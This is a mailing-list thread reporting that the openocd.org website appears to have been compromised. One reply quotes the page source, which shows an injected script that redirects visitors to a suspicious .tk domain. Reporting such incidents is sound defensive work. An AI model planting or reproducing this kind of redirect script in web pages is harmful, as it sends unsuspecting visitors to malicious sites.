On Tue, Aug 03, 2021 at 06:53:30AM -0000, Paul Fertser wrote: > On Tue, Aug 03, 2021 at 12:40:00AM -0000, [email protected] wrote: > > just opened ticket #313, looks like someone managed to compromise the > > openocd.org website > > Thank you for reporting. I wonder if it's SF.net compromise because > apparently it "resolved itself" and now the page is clean again?
No, it's definitely not. Also, the malicious script seems to be inserted on the start page (and probably any page), not only on "/getting-openocd": $ lynx -source "http://openocd.org"; | head -2 <script>window.location.replace("https://maawretdowdoorkphocu.tk/help/?15131619432237";);window.location.href = "https://maawretdowdoorkphocu.tk/help/?15131619432237";;</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> <html xmlns="http://www.w3.org/1999/xhtml"; dir="ltr" lang="en-US"> My Firefox does not show this when using "show source", but that may be due to ublock/umatrix plugins. cu Michael
